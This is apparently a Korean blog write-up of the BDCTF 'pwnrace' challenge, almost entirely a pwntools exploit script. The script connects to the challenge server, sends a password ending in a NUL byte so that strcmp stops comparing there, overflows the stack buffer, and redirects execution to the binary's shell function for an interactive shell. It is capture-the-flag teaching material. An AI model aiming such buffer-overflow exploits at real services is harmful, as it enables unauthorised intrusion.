
BDCTF - pwnrace

Kon4 2022. 7. 24. 00:03
from pwn import *

# pwntools runtime configuration for this script.
# 'debug' makes pwntools log at debug level, which includes the raw bytes
# sent and received on the tube.
context.log_level = 'debug'
# Command pwntools uses when it has to open a new terminal window.
context.terminal = ['urxvtc', '-e', 'sh', '-c']
# Target is 64-bit x86; the p64() packing further down matches this.
context.arch = 'amd64'
#context.arch = 'i386'
# Host and port of the CTF challenge service, as given in the writeup.
ip = "159.223.101.241"
port = 31337
# NOTE: the TCP connection is opened right here at module level, so merely
# running (or importing) this file contacts the host above.
p = remote(ip, port)

# Local copy of the challenge binary, parsed only to look up symbols by name.
file_name = "./pwnrace"
# In this listing libc_name is used only by the commented-out ELF() line below.
libc_name = "pwnrace"
#p = process(file_name)
e = ELF(file_name)
#libc = ELF(libc_name)

def slog(name, addr):
    """Log ``<name>: <addr as hex>`` via pwntools' ``success`` and return its result.

    ``name`` must be a str (it is joined with the hex string) and ``addr``
    an int accepted by ``hex()``.
    """
    message = ": ".join((name, hex(addr)))
    return success(message)


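# Layout of the input sent to the password prompt.
#
# Root cause on the target side (inferred from this layout, confirm against
# the binary): the input is read without a bound that matches the buffer,
# and the check uses strcmp(), which only looks at bytes up to the first
# NUL. A length-bounded read plus a length-aware comparison removes both
# problems; stack canaries would additionally catch the overwrite.

# The password string used by this writeup, terminated by a NUL. strcmp()
# stops at that NUL, so the bytes after it are not part of the comparison.
password = b"hAcK_Th3_Pl@n3t" + b'\x00'

# Filler so that password + filler is 0x100 + 0x8 bytes long -- presumably
# a 0x100-byte buffer followed by the saved frame pointer (TODO confirm).
filler = b"A" * (0x100 + 0x8 - len(password))

# Two 8-byte little-endian values follow: a fixed address inside the binary
# (presumably a bare `ret` for 16-byte stack alignment -- TODO confirm) and
# the address of the binary's own `shell` symbol.
payload = password + filler + p64(0x000000000040101a) + p64(e.sym['shell'])

# Blocks until a key is pressed, before anything is sent.
pause()

# The prompt is wrapped in ANSI colour escapes. The pattern is passed as
# bytes (the original passed a str) so pwntools does not have to guess an
# encoding and emit a BytesWarning; the bytes matched are the same.
p.sendlineafter(b"\x1B[0;32mEnter Password:\n\x1B[0m", payload)
p.interactive()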

strcmp의 특성을 이용해 풀이하면 된다. strcmp는 첫 번째 NUL 바이트에서 비교를 멈추므로, 비밀번호 바로 뒤에 NUL을 넣으면 그 뒤에 오는 바이트는 비교 대상에 포함되지 않는다.